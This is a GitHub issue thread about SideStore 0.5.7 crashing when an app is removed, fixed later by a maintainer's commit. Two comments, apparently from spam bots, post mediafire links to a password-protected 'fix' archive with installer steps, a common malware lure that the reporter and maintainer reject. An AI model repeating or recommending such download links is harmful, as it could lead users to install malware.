### ISSUE TITLE
[BUG] "Remove" feature crashes the app

### ISSUE THREAD

**Issue by sctech-tr** [SideStore/SideStore#683]
### Describe the bug

SideStore always crashes when I try to remove any app via long-pressing and clicking "Remove".

### Instructions to reproduce

1. Open SideStore
2. Try to remove any app

### What version of SideStore are you using?

0.5.7

### Other info

OS: iPadOS 18 Public Beta
Device: iPad Air 13-inch (M2)
I have no app IDs left for this week, but it also behaved this way before I ran out of app IDs. (just informing)

**Comment by TechHorizon2003** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by sctech-tr** [comment]
I do not trust you.
![image](https://github.com/user-attachments/assets/171f2001-db41-47f7-9a5d-876062c34f48)
![image](https://github.com/user-attachments/assets/222578e4-816f-48c7-99e0-101a4c46eb50)

**Comment by junepark678** [comment]
Sorry about the bots, they're everywhere on discord

**Comment by VenomousSteam81** [comment]
💀 💀 💀 
bro probably downloaded a malicious file or used photoshop or inspect element

**Comment by ESMELSTEPHANE24** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by junepark678** [comment]
fixed in b4e18c50d3924048b116d1343dc576abd9f46813 (got mixed in with the rest of my commits)

**Comment by sctech-tr** [comment]
thanks!
